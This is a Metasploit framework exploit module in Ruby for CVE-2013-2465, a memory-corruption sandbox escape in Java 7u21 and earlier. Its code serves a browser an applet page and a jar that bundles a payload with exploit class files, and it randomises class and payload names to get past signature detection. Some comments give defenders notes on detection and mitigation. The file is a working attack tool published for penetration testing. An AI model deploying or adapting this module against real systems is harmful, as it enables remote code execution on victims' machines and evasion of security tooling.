
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/java_storeimagearray.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Browser-delivered module for CVE-2013-2465 (storeImageArray() invalid array
# indexing in the Java runtime).
#
# What the code below does: it runs an HTTP server that answers a page request
# with an HTML document holding a single <applet> element, and answers the
# follow-up request for a path ending in ".jar" with an archive built from the
# framework payload plus three pre-compiled class files read from the
# framework data directory.
#
# Notes for defenders, taken from the metadata and code in this file:
# * Per the description, Java 7u21 and earlier are affected; the URL reference
#   points at an OpenJDK jdk7u-dev changeset (presumably the fix -- confirm).
# * Click-to-play is not bypassed (see Rank), so the plugin prompt remains an
#   effective control, as does disabling the browser Java plugin.
# * The class names (chosen in #setup), the jar name (chosen per HTML response)
#   and the "metasploit"/"Payload" strings (chosen per jar) are replaced with
#   random letters, so signatures on those literal names will not match. The
#   stable parts visible in this file are the <applet> element and the
#   'application/java-archive' response to a ".jar" request.
class MetasploitModule < Msf::Exploit::Remote
  # Ranked Great: there is no click2play bypass, and the Java Security Level
  # is now High by default.
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  #include Msf::Exploit::Remote::BrowserAutopwn
  #autopwn_info({ :javascript => false })

  # Registers the module metadata (name, references, platforms, targets).
  #
  # @param info [Hash] metadata supplied by the caller, merged via update_info
  def initialize(info = {})
    target_list = [
      ['Generic (Java Payload)', { 'Arch' => ARCH_JAVA, 'Platform' => 'java' }],
      ['Windows Universal',      { 'Arch' => ARCH_X86,  'Platform' => 'win' }],
      ['Linux x86',              { 'Arch' => ARCH_X86,  'Platform' => 'linux' }]
    ]

    reference_list = [
      ['CVE', '2013-2465'],
      ['OSVDB', '96269'],
      ['EDB', '27526'],
      ['PACKETSTORM', '122777'],
      ['URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040']
    ]

    metadata = {
      'Name'           => 'Java storeImageArray() Invalid Array Indexing Vulnerability',
      'Description'    => %q{
        This module abuses an Invalid Array Indexing Vulnerability on the
        static function storeImageArray() function in order to cause a
        memory corruption and escape the Java Sandbox. The vulnerability
        affects Java version 7u21 and earlier. The module, which doesn't bypass
        click2play, has been tested successfully on Java 7u21 on Windows and
        Linux systems.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Unknown',     # From PacketStorm
        'sinn3r',      # Metasploit
        'juan vazquez' # Metasploit
      ],
      'References'     => reference_list,
      'Platform'       => %w[java linux win],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        => target_list,
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2013-08-12'
    }

    super(update_info(info, metadata))
  end

  # Loads the three pre-compiled class files from the framework data directory
  # and rewrites the class names embedded in them before the server starts.
  #
  # Each replacement name has the same length as the name it replaces, so the
  # byte length of every blob is unchanged by the substitution.
  def setup
    read_class = lambda do |file_name|
      path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", file_name)
      File.open(path, "rb") { |io| io.read(io.stat.size) }
    end

    @exploit_class     = read_class.call("Exploit.class")
    @color_model_class = read_class.call("Exploit$MyColorModel.class")
    @color_space_class = read_class.call("Exploit$MyColorSpace.class")

    @exploit_class_name     = rand_text_alpha("Exploit".length)
    @color_model_class_name = rand_text_alpha("MyColorModel".length)
    @color_space_class_name = rand_text_alpha("MyColorSpace".length)

    # Applied in this order to every blob, in place.
    renames = {
      "Exploit"      => @exploit_class_name,
      "MyColorModel" => @color_model_class_name,
      "MyColorSpace" => @color_space_class_name
    }

    [@exploit_class, @color_model_class, @color_space_class].each do |blob|
      renames.each { |original, replacement| blob.gsub!(original, replacement) }
    end

    super
  end

  # Dispatches one HTTP request by the shape of its URI:
  # * ends in ".jar" (case-insensitive) -> the jar, then the payload handler
  # * ends in "/"                       -> the HTML page
  # * anything else                     -> redirect to the resource path plus "/"
  #
  # @param cli the client connection the response is written to
  # @param request the incoming request; only its uri is read here
  def on_request_uri(cli, request)
    uri = request.uri
    vprint_status("Requesting: #{uri}")

    if uri =~ /\.jar$/i
      print_status("Sending .jar file...")
      send_response(cli, generate_jar(cli), {'Content-Type'=>'application/java-archive'})
      return handler(cli)
    end

    if uri =~ /\/$/
      print_status("Sending HTML...")
      send_response_html(cli, generate_html, {'Content-Type'=>'text/html'})
    else
      vprint_status("Sending redirect...")
      send_redirect(cli, "#{get_resource}/", '')
    end

    nil
  end

  # Builds the HTML page: one <applet> element whose archive attribute is a
  # random 5-7 letter name ending in ".jar" and whose code attribute is the
  # class name chosen in #setup.
  #
  # @return [String] the HTML document, with no leading indentation
  def generate_html
    jar_name = rand_text_alpha(5+rand(3))

    <<~HTML
      <html>
      <head>
      </head>
      <body>
      <applet archive="#{jar_name}.jar" code="#{@exploit_class_name}" width="1000" height="1000">
      </applet>
      </body>
      </html>
    HTML
  end

  # Assembles the jar served to the client: the payload's encoded jar with the
  # three renamed class files added, then every entry's name and data rewritten
  # so the strings "metasploit" and "Payload" are replaced by random letters.
  #
  # @param cli the client connection, passed to regenerate_payload
  # @return the packed jar as returned by jar.pack
  def generate_jar(cli)
    regenerated = regenerate_payload(cli)
    jar = regenerated.encoded_jar

    jar.add_file("#{@exploit_class_name}.class", @exploit_class)
    jar.add_file("#{@exploit_class_name}$#{@color_model_class_name}.class", @color_model_class)
    jar.add_file("#{@exploit_class_name}$#{@color_space_class_name}.class", @color_space_class)

    metasploit_str = rand_text_alpha("metasploit".length)
    payload_str = rand_text_alpha("payload".length)

    jar.entries.each do |entry|
      entry.name.gsub!("metasploit", metasploit_str)
      entry.name.gsub!("Payload", payload_str)
      entry.data = entry.data.gsub("metasploit", metasploit_str).gsub("Payload", payload_str)
    end

    # Rebuilt after the renames above.
    jar.build_manifest

    jar.pack
  end
end